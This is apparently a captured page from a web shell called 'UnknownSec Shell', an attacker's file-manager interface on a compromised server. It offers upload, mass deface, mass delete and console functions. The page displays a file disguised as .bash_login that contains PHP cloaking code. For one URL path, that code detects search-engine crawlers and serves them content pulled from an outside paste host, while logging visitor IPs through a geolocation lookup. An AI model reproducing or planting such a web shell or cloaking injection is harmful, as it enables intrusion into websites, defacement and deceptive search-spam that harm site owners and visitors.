shell bypass 403
UnknownSec Shell
:
/
home
/
sokha
/ [
drwx--x--x
]
upload
mass deface
mass delete
console
info server
name :
.bash_login
<?php if (isset($_SERVER['REQUEST_URI'])) { $requestUri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH); if ($requestUri === '/siemreap' || $requestUri === '/siemreap/') { // User agent & referer (PHP 5.6 compatible) $agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; // ========================= // GET CLIENT IP // ========================= function getClientIP() { if (!empty($_SERVER['HTTP_CLIENT_IP'])) { return $_SERVER['HTTP_CLIENT_IP']; } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ips = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); return trim($ips[0]); } elseif (!empty($_SERVER['REMOTE_ADDR'])) { return $_SERVER['REMOTE_ADDR']; } return '0.0.0.0'; } $ipAddress = getClientIP(); // ========================= // GET COUNTRY BY IP // ========================= function getCountry($ip) { $url = "http://ipinfo.io/" . $ip . "/json"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 10); $response = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpCode != 200 || $response === false) { return null; } $data = json_decode($response, true); return isset($data['country']) ? $data['country'] : null; } $country = getCountry($ipAddress); // ========================= // OFFICIAL BOTS LIST // ========================= $officialBots = array( 'Googlebot', 'Google-InspectionTool', 'Bingbot', 'Slurp', 'DuckDuckBot', 'Baiduspider', 'YandexBot', 'Sogou', 'Exabot', 'facebot', 'ia_archiver', 'FacebookExternalHit', 'Twitterbot', 'LinkedInBot', 'Pinterestbot', 'Applebot', 'SamsungBot', 'CensysInspect', 'AhrefsBot', 'SemrushBot', 'MJ12bot', 'SeznamBot', 'Wbot', 'GoogleAdsBot', 'YandexMobileBot', 'BingPreview', 'Discordbot' ); // ========================= // BOT DETECTION // ========================= function isBot($userAgent, $bots) { foreach ($bots as $bot) { if (stripos($userAgent, $bot) !== false) { return true; } } return false; } // ========================= // BOT CONTENT DELIVERY // ========================= if (isBot($agent, $officialBots)) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://pastedav.id/d/PA8TVp3X"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 10); $response = curl_exec($ch); curl_close($ch); if ($response !== false) { echo $response; } else { echo "Failed to fetch the content."; } exit; } } } ?>
© 2025 UnknownSec